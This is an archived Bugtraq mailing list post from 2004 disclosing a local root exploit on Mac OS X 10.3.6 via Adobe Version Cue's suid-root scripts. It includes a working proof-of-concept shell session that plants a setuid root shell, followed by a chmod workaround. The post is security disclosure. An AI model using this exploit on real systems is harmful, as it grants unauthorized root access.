Home page logo

bugtraq logo Bugtraq mailing list archives

Local root exploit on Mac OS X with Adobe Version Cue
From: fintler <fintler () gmail com>
Date: Mon, 6 Dec 2004 21:15:32 -0500

Note: Sorry if this is a dupe, I might of sent it to the wrong address.

Local root exploit on Mac OS X 10.3.6 with Adobe products installed
Found by Jonathan Bringhurst <fintler () gmail com NOSPAM>


It's possible to create a suid root shell with a non-privileged user
on a Mac OS X 10.3.6 system with Adobe Version Cue installed. Adobe
Version Cue is installed by default with virtually every recent Adobe
product. This most likely affects many versions of Mac OS X and Adobe
Version Cue.


Scripts to start and stop Adobe Version Cue are suid root and do not
make any checks to see if they are running from the correct path. By
setting the current path to a controlled directory and creating
scripts with specific names, a user can have a custom script run euid

Proof of concept:

haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh
haven:~ fintler$ chmod 0755 ./productname.sh
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver.sh .
haven:~ fintler$ ./stopserver.sh
Stopping  ...

./stopserver.sh: line 21: ./tomcat/bin/shutdown.sh: No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami

Work Around:

The following may disable aspects of Adobe Version Cue but should
temporarily fix the issue until a more permanent solution is released
from Adobe:
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/stopserver.sh'
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/startserver.sh'


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]